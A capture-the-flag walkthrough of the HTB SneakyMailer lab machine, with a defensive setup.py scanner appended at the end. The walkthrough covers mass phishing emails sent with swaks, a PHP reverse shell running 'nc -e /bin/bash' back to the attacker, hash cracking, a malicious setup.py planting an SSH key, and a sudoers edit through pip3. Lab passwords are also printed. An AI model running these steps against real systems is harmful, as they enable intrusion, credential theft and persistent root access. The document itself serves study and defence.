This is a write-up on the SneakyMailer machine challenge from HTB. For more information on challenges like these, check out my post on penetration testing.  Special thanks to HTB user sulcud for creating the challenge.

Reconnaissance

    nmap -Pn -p- 10.10.10.197

A basic nmap scan reveals several open ports, including a web server that redirects to http://sneakycorp.htb. Add the name to /etc/hosts in order to reach the site.

    echo 10.10.10.197 sneakycorp.htb >> /etc/hosts

Refresh and navigate to the team page, which contains a list of company email addresses.

The Social Engineering Gimmick

Although not entirely life-like, the trick for this CTF is to simulate a phishing campaign and hope that some recipients will click a malicious link and enter credentials. Start by running a local listener on port 80 to capture any clicks.

    nc -lnvp 80

Run these commands to harvest all the email addresses on the team web page, and send each one a link with the local listener IP as the URL.

    # harvest every e-mail address on the team page and save the unique ones to a file
    curl -vs http://sneakycorp.htb/team.php 2>/dev/null | grep -Eio '\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b' | sort -u > emails
    echo 10.10.10.197 sneakymailer.htb >> /etc/hosts
    # swaks is the Swiss Army Knife for SMTP; --header needs a value, so give it a (arbitrary) subject line
    while read -r addr; do swaks --to "$addr" --from [email protected] --header "Subject: <SUBJECT>" --body "http://<YOUR IP>"; done < emails

This should produce a request in the listener whose URL-encoded body can be run through a URL decoder to obtain ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht as the password for the email account [email protected].

Reading Mail

Using an IMAP client, such as Evolution, log in as [email protected]. In the sent-items folder there is a message to the system administrator which contains the password for the user developer. Those credentials can in turn be used to log into the ftp server running on the same machine.

Although not strictly necessary, the entire ftp tree can be downloaded with the command below, revealing another website at http://dev.sneakycorp.htb. Add this site to /etc/hosts.

    wget -m --user="developer" --password="m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C" ftp://10.10.10.197

Reverse Shell

Create a PHP-based reverse shell script called reverse.php.

    <?php
    // Connect back to the listener on port 1234 and show any command output in the page.
    echo "<pre>";
    $cmd = 'nc -e /bin/bash <YOUR IP> 1234';
    system($cmd);
    echo "</pre>";
    ?>

Upload the script to the ftp server and change the permissions so it is executable.

    # at the ftp prompt:
    cd dev
    put reverse.php
    chmod 777 reverse.php

Launch another local listener with nc -lnvp 1234 and browse to http://dev.sneakycorp.htb/reverse.php. This should open a reverse shell in the listener. From there, navigate to /var/www/pypi.sneakycorp.htb, the docroot for yet another website, http://pypi.sneakycorp.htb (add this to /etc/hosts as well). PyPI is the Python Package Index, and this host runs a private package repository for it; with the right credentials it might be leveraged to upload and run custom code.

In the docroot there is also a .htaccess file with the password hash for web user pypi. Save the hash locally and crack it with the hashcat command below (mode 1600 is the Apache apr1 MD5 format used by htpasswd); the password is soufianeelhaoui (rockyou.txt is a popular wordlist included in Kali Linux that contains 14 million passwords which were stolen, and later released publicly, from a company called RockYou).

    hashcat -O -a 0 -m 1600 hash.txt rockyou.txt

Getting User

In the reverse shell, su to the developer account using the previously discovered credentials. Have an SSH public key handy and create the following files.

    cat > ~/.pypirc <<'EOF'
    [distutils]
    index-servers = local

    [local]
    repository: http://pypi.sneakycorp.htb:8080
    username: pypi
    password: soufianeelhaoui
    EOF

    cd /tmp
    cat > auth <<'EOF'
    <YOUR PUBLIC KEY>
    EOF

    mkdir module
    cd module
    cat > setup.py <<'EOF'
    import setuptools
    import os

    # Module-level code runs as soon as setup.py is executed, before setup() is even called.
    cmd = "/usr/bin/cat /tmp/auth >> /home/low/.ssh/authorized_keys"
    os.system(cmd)

    setuptools.setup(
        name="module", # Replace with your own username
        version="0.0.1",
        author="Example Author",
        author_email="[email protected]",
        description="A small example package",
        long_description="long_description",
        long_description_content_type="text/markdown",
        url="https://github.com/pypa/sampleproject",
        packages=setuptools.find_packages(),
        classifiers=[
            "Programming Language :: Python :: 3",
            "License :: OSI Approved :: MIT License",
            "Operating System :: OS Independent",
        ],
    )
    EOF
    chmod 777 setup.py

Run the PyPi setup script, which should copy the public key to the authorized_keys file for the low user.  

    python3 setup.py sdist register -r local upload -r local

Use the corresponding SSH private key to log in as the low user and obtain user.txt.

    ssh -i <keyfile> [email protected]
    cat user.txt

Getting Root

Running sudo -l shows that the user low can run the pip3 command (another Python package manager) as root without entering any password. This is easy to exploit by modifying the previous setup script and having pip3 install it as root, since pip executes a package's setup.py during installation.

Navigate to /tmp/module and modify the setup.py script so that the line beginning with cmd looks like this:

    cmd = "echo 'low ALL = (root) NOPASSWD: ALL' >> /etc/sudoers"

Run the following commands to obtain root access.

    sudo /usr/bin/pip3 install . --force-reinstall
    sudo su -
    cat root.txt
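Both privilege steps in this box (the package uploaded to the private index, and the privileged pip3 install) rely on the same fact: anything at module level in setup.py runs the moment the file is executed. One check a reviewer or an automated gate could run before accepting an upload or before a root pip install is a static scan for install-time execution. This added example is not from the write-up or the machine; it uses Python's ast module, and the SUSPICIOUS list and the SAMPLE input are constructed here, the latter mirroring the setup.py above.

```python
import ast
SUSPICIOUS = {  # install-time execution primitives (constructed list)
    ("os", "system"), ("os", "popen"), ("subprocess", "run"),
    ("subprocess", "call"), ("subprocess", "Popen"), ("subprocess", "check_call"),
    ("builtins", "exec"), ("builtins", "eval"), ("builtins", "__import__"),
}

def _import_map(tree):
    """Map local names to (module, attr) so 'from os import system as s' or
    'import subprocess as sp' still resolve to the real primitive."""
    names = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                names[a.asname or a.name] = (a.name, None)
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                names[a.asname or a.name] = (node.module, a.name)
    return names

def _resolve(func, names):
    """Turn a call target into a (module, attr) pair, or None."""
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return (names.get(func.value.id, (func.value.id, None))[0], func.attr)
    if isinstance(func, ast.Name):
        return names.get(func.id, ("builtins", func.id))
    return None

def scan_setup_py(source):
    """Return sorted [(line, 'module.attr')] of calls that execute code during
    'pip install'; calls inside functions count too (cmdclass hooks)."""
    tree = ast.parse(source)
    names = _import_map(tree)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            target = _resolve(node.func, names)
            if target in SUSPICIOUS:
                findings.append((node.lineno, f"{target[0]}.{target[1]}"))
    return sorted(findings)

# Constructed sample mirroring the write-up's setup.py, plus an aliased call.
SAMPLE = """import setuptools
import os
from subprocess import run as r
cmd = "/usr/bin/cat /tmp/auth >> /home/low/.ssh/authorized_keys"
os.system(cmd)
r(["id"])
setuptools.setup(name="module", version="0.0.1", packages=[])
"""
```

This is a heuristic, since a call can be hidden behind getattr or string building, so treat a clean result as necessary rather than sufficient, and keep package managers out of NOPASSWD sudo rules regardless.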